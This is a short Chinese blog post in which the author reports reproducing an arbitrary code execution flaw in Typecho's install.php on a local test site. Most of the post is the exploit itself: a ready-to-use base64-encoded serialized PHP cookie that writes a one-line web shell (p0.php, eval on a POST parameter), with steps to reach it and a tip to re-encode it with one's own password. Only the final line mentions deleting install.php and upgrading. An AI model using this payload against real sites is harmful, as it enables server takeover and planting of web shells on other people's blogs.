近期看到typecho有任意代码执行漏洞,才记得我的博客有好久没有更新了,特来将其“捡起来”,日 后养成将博客来时时更新!


好了来说下关入这个漏洞:

 http://p0sec.net/index.php/archives/114/  网上关于这个的写的很详细

我也在我我本地进行了测试,确实是存在的,下面是我测试的步骤

1. http://127.0.0.1/typecho/install.php?finish=1   访问地址判断是否删了install 文件

2. 设置cookie
 Cookie: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTc6ImZpbGVfcHV0X2NvbnRlbnRzKCdwMC5waHAnLCAnPD9waHAgQGV2YWwoJF9QT1NUW3AwXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ==
 便会在网站根目录下生产一句话p0.php,密码p0
 (用面的base64加密,可以自己解一下,换成你自己的密码)
 
3. 访问地址 http://127.0.0.1/typecho/p0.php  
    访问参数 p0=phpinfo();    
  就可以了


紧急休复了下,将install.php删了,然后升级到最新的版本